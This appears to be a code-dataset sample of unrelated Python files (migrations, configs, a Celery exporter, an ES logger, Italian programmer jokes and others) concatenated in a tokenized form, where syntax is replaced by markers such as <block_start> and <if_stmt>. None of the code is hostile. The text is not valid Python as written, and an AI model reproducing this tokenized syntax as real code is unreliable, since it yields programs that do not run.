exists."<line_sep>id_=PRETRAINED_MODEL_LIST[tag]<if_stmt>download_dir<is><none><block_start>download_dir=os.path.expanduser("~/.cache/parallel_wavegan")<block_end>output_path=f"{download_dir}/{tag}.tar.gz"<line_sep>os.makedirs(f"{download_dir}" exist_ok=<true>)<with_stmt>FileLock(output_path+".lock")<block_start><if_stmt><not>os.path.exists(output_path)# lazy load for compatibility <block_start><import_stmt>gdown<line_sep>gdown.download(f"https://drive.google.com/uc?id={id_}" output_path quiet=<false>)<with_stmt>tarfile.open(output_path "r:*")<as>tar<block_start><for_stmt>member tar.getmembers()<block_start><if_stmt>member.isreg()<block_start>member.name=os.path.basename(member.name)<line_sep>tar.extract(member f"{download_dir}/{tag}")<block_end><block_end><block_end><block_end><block_end>checkpoint_path=find_files(f"{download_dir}/{tag}" "checkpoint*.pkl")<line_sep><return>checkpoint_path[0]<block_end>
s=input()<line_sep>y=s[0]<line_sep>w=s[2]<if_stmt>int(y)<g>int(w)<block_start>p=7-int(y)<block_end><else_stmt><block_start>p=7-int(w)<block_end><if_stmt>p<eq>1<block_start>print('1/6')<block_end><if_stmt>p<eq>2<block_start>print('1/3')<block_end><if_stmt>p<eq>3<block_start>print('1/2')<block_end><if_stmt>p<eq>4<block_start>print('2/3')<block_end><if_stmt>p<eq>5<block_start>print('5/6')<block_end><if_stmt>p<eq>6<block_start>print('1/1')<block_end>
"""allow modified date as nullable Revision ID: 166054bd81b5 Revises: <PASSWORD> Create Date: 2021-10-11 03:47:20.983464 """<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<import_from_stmt>sqlalchemy.dialects postgresql<line_sep># revision identifiers, used by Alembic. revision="<KEY>"<line_sep>down_revision="80b8d<PASSWORD>"<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.alter_column("application" "modified" existing_type=postgresql.TIMESTAMP() nullable=<true>)<line_sep>op.alter_column("form_process_mapper" "modified" existing_type=postgresql.TIMESTAMP() nullable=<true> )<line_sep># ### end Alembic commands ### <block_end><def_stmt>downgrade # ### commands auto generated by Alembic - please adjust! ### <block_start>op.alter_column("form_process_mapper" "modified" existing_type=postgresql.TIMESTAMP() nullable=<false> )<line_sep>op.alter_column("application" "modified" existing_type=postgresql.TIMESTAMP() nullable=<false>)<line_sep># ### end Alembic commands ### <block_end>
# -*- coding: utf-8 -*- """ Jokes from stackoverflow - provided under CC BY-SA 3.0 http://stackoverflow.com/questions/234075/what-is-your-best-programmer-joke?page=4&tab=votes#tab-top """<line_sep>neutral=["Trionfalmente, Beth ha rimosso Python 2.7 dal server nel 2020.'Finalmente!' ha detto con gioia, solo per vedere l'annuncio di Python 4.4." "Una query SQL entra in un bar, cammina verso a due table e chiede: 'Posso unirvi?'." "Quando il tuo martello e` C ++, tutto inizia a sembrare un pollice." "Se metti un milione di scimmie su un milione di tastiere, uno di loro alla fine scrivera` un programma Java, il resto scrivera` Perl." "Per comprendere la ricorsione devi prima capire la ricorsione." "Gli amici non permettono agli amici di usare Python 2.7." "Ho suggerito di tenere un 'Python Object Oriented Programming Seminar', ma l'acronimo era impopolare." "'toc, toc'. 'Chi e` la`?' ... pausa molto lunga ... Java." "Quanti programmatori ci vogliono per cambiare una lampadina? Nessuno, e` un problema hardware." "Qual e` il modo orientato agli oggetti per diventare ricchi? Ereditarieta`." "Quanti programmatori ci vogliono per cambiare una lampadina? Nessuno, possono rendere l'oscurita` uno standard." "I vecchi programmatori C non muoiono, sono solo gettati nel void." "Gli sviluppatori di software amano risolvere i problemi: se non ci sono problemi facilmente disponibili li creeranno." ".NET e` stato chiamato .NET in modo che non si visualizzasse in un elenco di directory Unix." "Hardware: la parte di un computer che puoi calciare." "Un programmatore e` stato trovato morto nella doccia, accanto al corpo c'era uno shampoo con le istruzioni:Insapona, risciacqua ripeti." "Ottimista: il bicchiere e` mezzo pieno Pessimista: il bicchiere e` mezzo vuoto Programmatore: il bicchiere e` il doppio del necessario." "In C abbiamo dovuto codificare i nostri bug. In C ++ possiamo ereditarli." "Come mai non c'e` una gara Perl offuscato? Perche` tutti vincerebbero." "Se riproduci un CD di Windows all'indietro, ascolterai il canto satanico ... peggio ancora, se lo riproduci in avanti, installa Windows." "Quanti programmatori ci vogliono per uccidere uno scarafaggio? Due: uno tiene, l'altro installa Windows su di esso." "Come si chiama un programmatore finlandese? Nerdic." "Cosa ha detto il codice Java al codice C? : Non hai classe." "Perche` Microsoft ha chiamato il proprio motore di ricerca BING? Because It's Not Google." "I venditori di software e i venditori di auto usate si differenziano perche` questi ultimi sanno quando mentono." "Bambino: 'papa', perche` il sole sorge ad est e tramonta ad ovest?' Papa': 'figlio, sta funzionando, non toccarlo'." "Quanti programmatori Prolog ci vogliono per cambiare una lampadina? Falso." "I veri programmatori possono scrivere codice assembly in qualsiasi lingua." "Cameriere: 'le piacerebbe un caffe` o un te`?' Programmatore: 'Si'." "Un programmatore entra in un foo ..." "Qual e` il secondo nome di <NAME>? <NAME>." "Perche` sorridi sempre? Questa e` solo la mia ... espressione regolare." "Domanda stupida ASCII, ottiene uno stupido ANSI." "Un programmatore aveva un problema: penso` tra se stesso: 'lo risolvo con i threads!', ora ha due problemi." "Java: scrivi una volta e scappa." "Ti direi una battuta su UDP, ma non lo capiresti mai." "Un ingegnere di QA entra in un bar, si imbatte in un bar, striscia in un bar, balla in un bar, punta i piedi in un bar..." "Ho avuto un problema quindi ho pensato di utilizzare Java. Ora ho una ProblemFactory." "L'ingegnere del QA entra in un bar, ordina una birra, ordina 0 birre, 99999 birre, una lucertola, -1 birre, uno sfdeljknesv." "Un responsabile di prodotto entra in un bar, chiede un drink, il barista dice NO, ma prendera` in considerazione l'aggiunta successiva." "Come si genera una stringa casuale? Metti uno studente di Informatica del primo anno davanti a Vim e gli chiedi di salvare ed uscire." "Uso Vim da molto tempo ormai, principalmente perche` non riesco a capire come uscire." "Come fai a sapere se una persona e` un utente Vim? Non ti preoccupare, te lo diranno." "un cameriere urla: 'sta soffocando! Qualcuno e` un dottore?' Programmatore: 'sono un utente Vim'." "3 Database Admins sono entrati in un bar NoSQL e poco dopo sono usciti perche` non sono riusciti a trovare un table." "Come spiegare il film Inception a un programmatore? Quando esegui una VM dentro una VM dentro un' altra VM tutto procede molto lentamente." "Come si chiama un pappagallo che dice 'Squawk! Pezzi di nove! Pezzi di nove!' Un errore a pappagallo." "Ci sono solo due problemi difficili in Informatica: invalidazione della cache, denominazione delle cose e errori di off-by-one." "Ci sono 10 tipi di persone: quelli che comprendono il binario e quelli che non lo sanno." "Ci sono 2 tipi di persone: quelli che possono estrapolare dati da insiemi incompleti ..." "Esistono II tipi di persone: quelli che comprendono i numeri romani e quelli che non li conoscono." "Ci sono 10 tipi di persone: quelli che comprendono l'esadecimale e altri 15." "Ci sono 10 tipi di persone: quelli che capiscono il trinario, quelli che non lo fanno e quelli che non ne hanno mai sentito parlare." "Come chiami otto hobbit? Un hob byte." "La cosa migliore di un booleano e` che anche se ti sbagli, sei solo fuori di un bit." "Un buon programmatore e` qualcuno che guarda sempre in entrambe le direzioni prima di attraversare una strada a senso unico." "Esistono due modi per scrivere programmi privi di errori: solo il terzo funziona." "I controlli di qualita` consistono nel 55% di acqua, 30% di sangue e 15% di ticket in Jira." "Quanti QA servono per cambiare una lampadina? Hanno notato che la stanza era buia,: non risolvono i problemi, li trovano." "Un programmatore si schianta contro un'auto , l'uomo chiede 'cosa e` successo', l'altro risponde'Non so. Facciamo il backup e riprova'." "Scrivere PHP e` come fare pipi` in piscina, tutti lo hanno fatto, ma non hanno bisogno di renderlo pubblico." "Numero di giorni da quando ho riscontrato un errore di indice di array: -1." "gli appuntamenti veloci sono inutili, 5 minuti non sono sufficienti per spiegare correttamente i benefici della filosofia Unix." "Microsoft ha ogni quindici giorni una 'settimana produttiva' dove usa Google invece di Bing." "Trovare un buon sviluppatore PHP e` come cercare un ago in un pagliaio o e` un hackstack in un ago?." "Unix e` user friendly, e` solo molto particolare nella scelta di chi siano i suoi amici." "Un programmatore COBOL guadagna milioni con la riparazione Y2K e decide di congelarsi criogenicamente. L'anno e` 9999." "Il linguaggio C combina tutta la potenza del linguaggio assembly con tutta la facilita` d'uso del linguaggio assembly." "Un esperto SEO entra in un bar, pub, pub irlandese, taverna, barista, birra, liquore, vino, alcolici, liquori ..." "Che cosa significa Emacs? Utilizzato esclusivamente dagli scienziati informatici di mezza eta`." "Che cosa hanno in comune le battute di PyJokes con Adobe Flash? Si aggiornano sempre, ma non migliorano." "Quanti demosceners sono necessari per cambiare una lampadina? Meta`. Con uno intero non ci sono sfide." ]<line_sep>""" Jokes from The Internet Chuck Norris DB (ICNDB) (http://www.icndb.com/) - provided under CC BY-SA 3.0 http://api.icndb.com/jokes/ """<line_sep>chuck=["Tutti gli array che Chuck Norris dichiara sono di dimensioni infinite, perche` Chuck Norris non conosce limiti." "Chuck Norris non ha la latenza del disco perche` il disco rigido sa sbrigarsi, altrimenti sono guai." "Chuck Norris scrive codice che si ottimizza da solo." "Chuck Norris non puo` testare l'uguaglianza perche` non ha eguali." "Chuck Norris non ha bisogno di garbage collection perche` non chiama .Dispose (), chiama .DropKick ()." "Il primo programma di Chuck Norris e` stato kill -9." "Chuck Norris ha scoppiato la bolla delle dot com." "Tutti i browser supportano le definizioni esadecimali #chuck e #norris per i colori nero e blu." "MySpace non e` proprio il tuo spazio, e` di Chuck (te lo lascia solo usare)." "Chuck Norris puo` scrivere funzioni infinitamente ricorsive e farle tornare." "Chuck Norris puo` risolvere le Torri di Hanoi in una mossa." "L'unico modello di design che Chuck Norris conosce e` il God Object Pattern." "Chuck Norris ha terminato World of Warcraft." "I project manager non chiedono mai a Chuck Norris le stime." "Chuck Norris non usa gli standard web in quanto il web si conformera` a lui." "'Funziona sulla mia macchina' e` sempre vero per Chuck Norris." "Chuck Norris non fa i grafici di Burn Down, fa i grafici di Smack Down." "Chuck Norris puo` cancellare il cestino." "La barba di Chuck Norris puo` scrivere 140 parole al minuto." "Chuck Norris puo` testare tutte le applicazioni con un'unica affermazione, 'funziona'." "La tastiera di Chuck Norris non ha un tasto Ctrl perche` niente controlla Chuck Norris." "Chuck Norris puo` far traboccare il tuo stack solo guardandolo." "Per Chuck Norris, tutto contiene una vulnerabilita`." "Chuck Norris non usa sudo, la shell sa solo che e` lui e fa quello che gli viene detto." "Chuck Norris non ha bisogno di un debugger, si limita a fissare il codice finche` non confessa." "Chuck Norris puo` accedere a metodi privati." "Chuck Norris puo` istanziare una classe astratta." "L'oggetto classe eredita da Chuck Norris." "Chuck Norris conosce l'ultima cifra del Pi greco." "La connessione di Chuck Norris e` piu' veloce in up che in down perche` i dati sono incentivati a correre via da lui." "Nessuna affermazione puo` prendere la ChuckNorrisException." "Chuck Norris puo` scrivere applicazioni multi-thread con un singolo thread." "Chuck Norris non ha bisogno di usare AJAX perche` le pagine hanno troppa paura di postback comunque." "Chuck Norris non usa la riflessione, la riflessione chiede educatamente il suo aiuto." "Non c'e` alcun tasto Esc sulla tastiera di Chuck Norris, perche` nessuno sfugge a Chuck Norris." "Chuck Norris puo` eseguire la ricerca binaria di dati non ordinati." "Chuck Norris non ha bisogno di tentativi di cattura, le eccezioni sono troppo spaventate da sollevarsi." "Chuck Norris e` uscito da un ciclo infinito." "Se Chuck Norris scrive codice con bug, gli errori si risolvono da soli." "L'hosting di Chuck Norris e` garantito al 101% di uptime." "La tastiera di Chuck Norris ha il tasto Any." "Chuck Norris puo` accedere al database dall'interfaccia utente." "I programmi di Chuck Norris non escono mai, sono terminati." "I programmi di Chuck Norris occupano il 150% della CPU, anche quando non sono in esecuzione." "Chuck Norris puo` generare thread che si completano prima di essere avviati." "I programmi di Chuck Norris non accettano input." "Chuck Norris puo` installare iTunes senza installare Quicktime." "Chuck Norris non ha bisogno di un sistema operativo." "Il modello di rete OSI di Chuck Norris ha un solo livello: fisico." "Chuck Norris puo` compilare errori di sintassi." "Chuck Norris non ha bisogno di digitare cast. Il Chuck-Norris Compiler (CNC) vede attraverso le cose, fino in fondo sempre." "Chuck Norris comprime i suoi file con un calcio rotante sul disco rigido." "Con Chuck Norris P = NP. Non c'e` alcun nondeterminismo con le decisioni di Chuck Norris." "Chuck Norris puo` recuperare qualsiasi cosa da / dev / null." "Nessuno ha mai programmato in coppia con Chuck Norris ed e`vissuto per raccontare la storia." "Nessuno ha mai parlato durante la revisione del codice di Chuck Norris ed e` vissuto per raccontare la storia." "Chuck Norris non usa una GUI, preferisce la linea di comando." "Chuck Norris non usa Oracle, lui e` l'Oracle." "Chuck Norris puo` dereferenziare NULL." "Una differenza tra il tuo codice e quello di Chuck Norris e` infinita." "Il plugin Chuck Norris Eclipse e` diventato un contatto alieno." "Chuck Norris e` l'ultimo mutex, tutti i thread lo temono." "Non preoccuparti dei test, i test case di Chuck Norris coprono anche il tuo codice." "Le dichiarazioni del registro di Chuck Norris sono sempre al livello FATAL." "Chuck Norris ha completato World of Warcraft." "Quando Chuck Norris rompe la build, non e` possibile risolverla, perche` non c'e` una sola riga di codice." "Chuck Norris scrive con un dito, lo punta alla tastiera e la tastiera fa il resto." "I programmi di Chuck Norris possono superare il test di Turing fissando l'interrogatore." "Se provi kill -9 con i programmi di Chuck Norris, si ritorce contro." "Chuck Norris esegue loop infiniti in meno di 4 secondi." "Chuck Norris puo` sovrascrivere una variabile bloccata." "Chuck Norris conosce il valore di NULL." "Chuck Norris puo` installare un sistema operativo a 64 bit su macchine a 32 bit." "Chuck Norris puo` scrivere su un flusso di output." "Chuck Norris puo` leggere da un flusso di input." "Chuck Norris non ha mai scritto il suo programma in codice macchina. Le macchine hanno imparato a interpretare il codice di Chuck Norris." "I test unitari di Chuck Norris non girano, muoiono." "Chuck Norris causa la schermata blu della morte." "Chuck Norris puo` fare una classe che e` sia astratta che finale." "Chuck Norris potrebbe usare qualsiasi cosa in java.util.* per ucciderti, inclusi i javadoc." "Il codice gira piu` velocemente quando <NAME> lo guarda." "<NAME> non usa REST, lui aspetta." "Su Facebook a tutti piace <NAME>, che lo scelgano o no." "Non puoi seguire <NAME> su Twitter, perche` lui ti segue." "La calcolatrice di <NAME> ha solo 3 tasti: 0, 1 e NAND." "<NAME> utilizza solo variabili globali. Non ha nulla da nascondere." "<NAME> scrive direttamente in binario. Quindi scrive il codice sorgente come documentazione per altri programmatori." ]<line_sep>jokes_it={'neutral':neutral 'chuck':chuck 'all':neutral+chuck }<line_sep>
# -*- coding: utf-8 -*- # Generated by Django 1.9.6 on 2017-05-09 12:03 <import_from_future_stmt> unicode_literals<import_from_stmt>django.db migrations models<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('submission' '0001_initial') ]<line_sep>operations=[migrations.AlterField(model_name='submission' name='code' field=models.TextField() ) migrations.RenameField(model_name='submission' old_name='accepted_info' new_name='statistic_info' ) migrations.RemoveField(model_name='submission' name='accepted_time' ) migrations.RenameField(model_name='submission' old_name='created_time' new_name='create_time' ) migrations.AlterModelOptions(name='submission' options={'ordering':('-create_time' )} )]<block_end>
"""Utils for date range generation."""<import_from_stmt>datetime datetime<import_from_stmt>typing Union<import_from_stmt>pyspark.sql DataFrame functions<import_from_stmt>butterfree.clients SparkClient<import_from_stmt>butterfree.constants DataType<import_from_stmt>butterfree.constants.columns TIMESTAMP_COLUMN<def_stmt>get_date_range client:SparkClient start_date:Union[str datetime] end_date:Union[str datetime] step:int=<none> <arrow>DataFrame<block_start>"""Create a date range dataframe. The dataframe returning from this method will containing a single column TIMESTAMP_COLUMN, of timestamp type, with dates between start and end. Args: client: a spark client. start_date: range beginning value (inclusive). end_date: range last value (exclusive) step: optional step, in seconds. Returns: A single column date range spark dataframe. """<line_sep>day_in_seconds=60<times>60<times>24<line_sep>step=step<or>day_in_seconds<line_sep>start_date=(start_date<if>isinstance(start_date str)<else>start_date.strftime("%Y-%m-%d"))<line_sep>end_date=end_date<if>isinstance(end_date str)<else>end_date.strftime("%Y-%m-%d")<line_sep>date_df=client.conn.createDataFrame([(start_date end_date)] ("start_date" "end_date")).select([functions.col(c).cast(DataType.TIMESTAMP.spark).cast(DataType.BIGINT.spark)<for>c ("start_date" "end_date")])<line_sep>start_date,end_date=date_df.first()<line_sep><return>client.conn.range(start_date end_date+day_in_seconds step# type: ignore ).select(functions.col("id").cast(DataType.TIMESTAMP.spark).alias(TIMESTAMP_COLUMN))<block_end>
<import_from_stmt>threading Thread<import_stmt>kombu.exceptions<import_from_stmt>flask Blueprint Flask current_app request<import_from_stmt>loguru logger<import_from_stmt>prometheus_client.exposition choose_encoder<import_from_stmt>waitress serve<line_sep>blueprint=Blueprint("celery_exporter" __name__)<line_sep>@blueprint.route("/")<def_stmt>index <block_start><return>""" <!doctype html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <title>celery-exporter</title> </head> <body> <h1>Celery Exporter</h1> <p><a href="/metrics">Metrics</a></p> </body> </html> """<block_end>@blueprint.route("/metrics")<def_stmt>metrics <block_start>encoder,content_type=choose_encoder(request.headers.get("accept"))<line_sep>output=encoder(current_app.config["registry"])<line_sep><return>output 200 {"Content-Type":content_type}<block_end>@blueprint.route("/health")<def_stmt>health <block_start>conn=current_app.config["celery_connection"]<line_sep>uri=conn.as_uri()<try_stmt><block_start>conn.ensure_connection(max_retries=3)<block_end><except_stmt>kombu.exceptions.OperationalError<block_start>logger.error("Failed to connect to broker='{}'" uri)<line_sep><return>(f"Failed to connect to broker: '{uri}'" 500)<block_end><except_stmt>Exception# pylint: disable=broad-except <block_start>logger.exception("Unrecognized error")<line_sep><return>("Unknown exception" 500)<block_end><return>f"Connected to the broker {conn.as_uri()}"<block_end><def_stmt>start_http_server registry celery_connection port<block_start>app=Flask(__name__)<line_sep>app.config["registry"]=registry<line_sep>app.config["celery_connection"]=celery_connection<line_sep>app.register_blueprint(blueprint)<line_sep>Thread(target=serve args=(app ) kwargs=dict(host="0.0.0.0" port=port _quiet=<true>) daemon=<true> ).start()<line_sep>logger.info("Started celery-exporter at port='{}'" port)<block_end>
# Author : <NAME> # Date : July 19th, 2007 # last update: $Date: 2010/03/17 18:17:34 $ by $Author: mussgill $ <import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># DCS partitions # "EBp","EBm","EEp","EEm","HBHEa","HBHEb","HBHEc","HF","HO","RPC" # "DT0","DTp","DTm","CSCp","CSCm","CASTOR","TIBTID","TOB","TECp","TECm" # "BPIX","FPIX","ESp","ESm" <import_stmt>DPGAnalysis.Skims.skim_detstatus_cfi<line_sep>ALCARECOTkAlCosmicsDCSFilter=DPGAnalysis.Skims.skim_detstatus_cfi.dcsstatus.clone(DetectorType=cms.vstring('TIBTID' 'TOB' 'TECp' 'TECm' 'BPIX' 'FPIX') ApplyFilter=cms.bool(<true>) AndOr=cms.bool(<true>) DebugOn=cms.untracked.bool(<false>))<line_sep>#________________________________Track selection____________________________________ # AlCaReco for track based alignment using Cosmic muons reconstructed by Combinatorial Track Finder <import_stmt>Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi<line_sep>ALCARECOTkAlCosmicsCTF=Alignment.CommonAlignmentProducer.AlignmentTrackSelector_cfi.AlignmentTrackSelector.clone(src='ctfWithMaterialTracksP5' filter=<true> applyBasicCuts=<true> ptMin=0. ##10 ptMax=99999. pMin=4. ##10 pMax=99999. etaMin=-99. ##-2.4 keep also what is going through... etaMax=99. ## 2.4 ...both TEC with flat slope nHitMin=7 nHitMin2D=2 chi2nMax=999999. applyMultiplicityFilter=<false> applyNHighestPt=<true> ## select only highest pT track nHighestPt=1)<line_sep># AlCaReco for track based alignment using Cosmic muons reconstructed by Cosmic Track Finder # (same cuts) ALCARECOTkAlCosmicsCosmicTF=ALCARECOTkAlCosmicsCTF.clone(src='cosmictrackfinderP5'## different for CTF )<line_sep># AlCaReco for track based alignment using Cosmic muons reconstructed by Regional Cosmic Tracking # (same cuts) ALCARECOTkAlCosmicsRegional=ALCARECOTkAlCosmicsCTF.clone(src='regionalCosmicTracks')<line_sep>#________________________________Sequences____________________________________ seqALCARECOTkAlCosmicsCTF=cms.Sequence(ALCARECOTkAlCosmicsCTF)<line_sep>seqALCARECOTkAlCosmicsCosmicTF=cms.Sequence(ALCARECOTkAlCosmicsCosmicTF)<line_sep>seqALCARECOTkAlCosmicsRegional=cms.Sequence(ALCARECOTkAlCosmicsRegional)<line_sep>
_base_='../faster_rcnn/faster_rcnn_r50_fpn_1x_coco.py'<line_sep># fp16 settings fp16=dict(loss_scale=512.)<line_sep>
<import_from_stmt>.matrix_factorization MF<line_sep>
""" A low level example: This is how JenkinsAPI creates views """<import_from_future_stmt> print_function<import_stmt>json<import_stmt>requests<line_sep>url='http://localhost:8080/createView'<line_sep>str_view_name="blahblah123"<line_sep>params={}# {'name': str_view_name} headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>data={"name":str_view_name "mode":"hudson.model.ListView" "Submit":"OK" "json":json.dumps({"name":str_view_name "mode":"hudson.model.ListView"})}<line_sep># Try 1 result=requests.post(url params=params data=data headers=headers)<line_sep>print(result.text.encode('UTF-8'))<line_sep>
<import_stmt>logging<import_from_stmt>..base.twilltestcase common ShedTwillTestCase<line_sep>log=logging.getLogger(__name__)<line_sep>category_name='Test 1460 Data Manager'<line_sep>category_description='Test script 1460 for testing Data Managers'<line_sep>data_manager_repository_name='data_manager_1460'<line_sep>data_manager_repository_description='Repository that contains a Data Manager'<line_sep>data_manager_repository_long_description=f'{data_manager_repository_name}: {data_manager_repository_description}'<line_sep>data_manager_name='testing_data_manager'<line_sep>data_manager_tar_file='1460_files/data_manager_files/test_data_manager.tar'<line_sep>''' 1. Add a Data Manager to toolshed 2. install Data Manager 3. Check that Data Manager tool '''<line_sep># TODO: Allow testing actual Execution of installed Data Manager Tool. <class_stmt>TestDataManagers(ShedTwillTestCase)<block_start>'''Test installing a repository containing a Data Manager.'''<def_stmt>test_0000_initiate_users_and_category self<block_start>"""Create necessary user accounts and login as an admin user."""<line_sep>self.login(email=common.admin_email username=common.admin_username)<line_sep>admin_user=self.test_db_util.get_user(common.admin_email)<assert_stmt>admin_user<is><not><none> f'Problem retrieving user with email {common.admin_email} from the database'<line_sep>self.test_db_util.get_private_role(admin_user)<line_sep>self.create_category(name=category_name description=category_description)<line_sep>self.login(email=common.test_user_2_email username=common.test_user_2_name)<line_sep>test_user_2=self.test_db_util.get_user(common.test_user_2_email)<assert_stmt>test_user_2<is><not><none> f'Problem retrieving user with email {common.test_user_2_email} from the database'<line_sep>self.test_db_util.get_private_role(test_user_2)<line_sep>self.login(email=common.test_user_1_email username=common.test_user_1_name)<line_sep>test_user_1=self.test_db_util.get_user(common.test_user_1_email)<assert_stmt>test_user_1<is><not><none> f'Problem retrieving user with email {common.test_user_1_email} from the database'<line_sep>self.test_db_util.get_private_role(test_user_1)<block_end><def_stmt>test_0010_create_data_manager_repository self<block_start>'''Create and populate data_manager_1460. This is step 1 - Create repository data_manager_1460. Create and populate a repository that contains a Data manager. '''<line_sep>category=self.test_db_util.get_category_by_name(category_name)<line_sep>repository=self.get_or_create_repository(name=data_manager_repository_name description=data_manager_repository_description long_description=data_manager_repository_long_description owner=common.test_user_1_name category_id=self.security.encode_id(category.id) strings_displayed=[])<line_sep># Upload the data manager files to the repository. self.upload_file(repository filename=data_manager_tar_file filepath=<none> valid_tools_only=<true> uncompress_file=<true> remove_repo_files_not_in_tar=<false> commit_message=f'Populate {data_manager_repository_name} with a data manager configuration.' strings_displayed=[] strings_not_displayed=[])<block_end><def_stmt>test_0020_install_data_manager_repository self<block_start>'''Install the data_manager_1460 repository to galaxy. This is step 3 - Attempt to install the repository into a galaxy instance, verify that it is installed. '''<line_sep>self.galaxy_login(email=common.admin_email username=common.admin_username)<line_sep>post_submit_strings_displayed=[data_manager_repository_name]<line_sep>self.install_repository(data_manager_repository_name common.test_user_1_name category_name install_tool_dependencies=<true> post_submit_strings_displayed=post_submit_strings_displayed)<block_end><def_stmt>test_0030_verify_data_manager_tool self<block_start>'''Verify that the data_manager_1460 repository is installed and Data Manager tool appears in list in Galaxy.'''<line_sep>repository=self.test_db_util.get_installed_repository_by_name_owner(data_manager_repository_name common.test_user_1_name)<line_sep>strings_displayed=['status' 'jobs' data_manager_name]<line_sep>self.display_installed_jobs_list_page(repository data_manager_names=data_manager_name strings_displayed=strings_displayed)<block_end><def_stmt>test_0040_verify_data_manager_data_table self<block_start>'''Verify that the installed repository populated shed_tool_data_table.xml and the sample files.'''<line_sep>self.verify_installed_repository_data_table_entries(required_data_table_entries=['data_manager_test_data_table'])<block_end><block_end>
<import_stmt>pickle<import_stmt>jax<import_stmt>jax.numpy<as>jnp<import_stmt>chex<import_from_stmt>functools partial<class_stmt>ESLog(object)<block_start><def_stmt>__init__ self num_dims:int num_generations:int top_k:int maximize:bool<block_start>"""Simple jittable logging tool for ES rollouts."""<line_sep>self.num_dims=num_dims<line_sep>self.num_generations=num_generations<line_sep>self.top_k=top_k<line_sep>self.maximize=maximize<block_end>@partial(jax.jit static_argnums=(0 ))<def_stmt>initialize self<arrow>chex.ArrayTree<block_start>"""Initialize the logger storage."""<line_sep>log={"top_fitness":jnp.zeros(self.top_k)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "top_params":jnp.zeros((self.top_k self.num_dims))-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_1":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_mean":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_top_std":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_1":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_mean":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "log_gen_std":jnp.zeros(self.num_generations)-1e10<times>self.maximize+1e10<times>(1-self.maximize) "gen_counter":0 }<line_sep><return>log<block_end># @partial(jax.jit, static_argnums=(0,)) <def_stmt>update self log:chex.ArrayTree x:chex.Array fitness:chex.Array<arrow>chex.ArrayTree<block_start>"""Update the logging storage with newest data."""<line_sep># Check if there are solutions better than current archive vals=jnp.hstack([log["top_fitness"] fitness])<line_sep>params=jnp.vstack([log["top_params"] x])<line_sep>top_idx=(self.maximize<times>((-1)<times>vals).argsort()+((1-self.maximize)<times>vals).argsort())<line_sep>log["top_fitness"]=vals[top_idx[:self.top_k]]<line_sep>log["top_params"]=params[top_idx[:self.top_k]]<line_sep>log["log_top_1"]=(log["log_top_1"].at[log["gen_counter"]].set(log["top_fitness"][0]))<line_sep>log["log_top_mean"]=(log["log_top_mean"].at[log["gen_counter"]].set(jnp.mean(log["top_fitness"])))<line_sep>log["log_top_std"]=(log["log_top_std"].at[log["gen_counter"]].set(jnp.std(log["top_fitness"])))<line_sep>log["log_gen_1"]=(log["log_gen_1"].at[log["gen_counter"]].set(self.maximize<times>jnp.max(fitness)+(1-self.maximize)<times>jnp.min(fitness)))<line_sep>log["log_gen_mean"]=(log["log_gen_mean"].at[log["gen_counter"]].set(jnp.mean(fitness)))<line_sep>log["log_gen_std"]=(log["log_gen_std"].at[log["gen_counter"]].set(jnp.std(fitness)))<line_sep>log["gen_counter"]<augadd>1<line_sep><return>log<block_end><def_stmt>save self log:chex.ArrayTree filename:str<block_start>"""Save different parts of logger in .pkl file."""<with_stmt>open(filename "wb")<as>handle<block_start>pickle.dump(log handle protocol=pickle.HIGHEST_PROTOCOL)<block_end><block_end><def_stmt>load self filename:str<block_start>"""Reload the pickle logger and return dictionary."""<with_stmt>open(filename "rb")<as>handle<block_start>es_logger=pickle.load(handle)<block_end><return>es_logger<block_end><def_stmt>plot self log title ylims=<none> fig=<none> ax=<none> no_legend=<false> <block_start>"""Plot fitness trajectory from evo logger over generations."""<import_stmt>matplotlib.pyplot<as>plt<if_stmt>fig<is><none><or>ax<is><none><block_start>fig,ax=plt.subplots(1 1 figsize=(6 3))<block_end>int_range=jnp.arange(1 log["gen_counter"]+1)<line_sep>ax.plot(int_range log["log_top_1"][:log["gen_counter"]] label="Top 1")<line_sep>ax.plot(int_range log["log_top_mean"][:log["gen_counter"]] label=f"Top-{self.top_k} Mean" )<line_sep>ax.plot(int_range log["log_gen_1"][:log["gen_counter"]] label="Gen. 1")<line_sep>ax.plot(int_range log["log_gen_mean"][:log["gen_counter"]] label="Gen. Mean" )<if_stmt>ylims<is><not><none><block_start>ax.set_ylim(ylims)<block_end><if_stmt><not>no_legend<block_start>ax.legend()<block_end><if_stmt>title<is><not><none><block_start>ax.set_title(title)<block_end>ax.set_xlabel("Number of Generations")<line_sep>ax.set_ylabel("Fitness Score")<line_sep>ax.spines["top"].set_visible(<false>)<line_sep>ax.spines["right"].set_visible(<false>)<line_sep><return>fig ax<block_end><block_end>
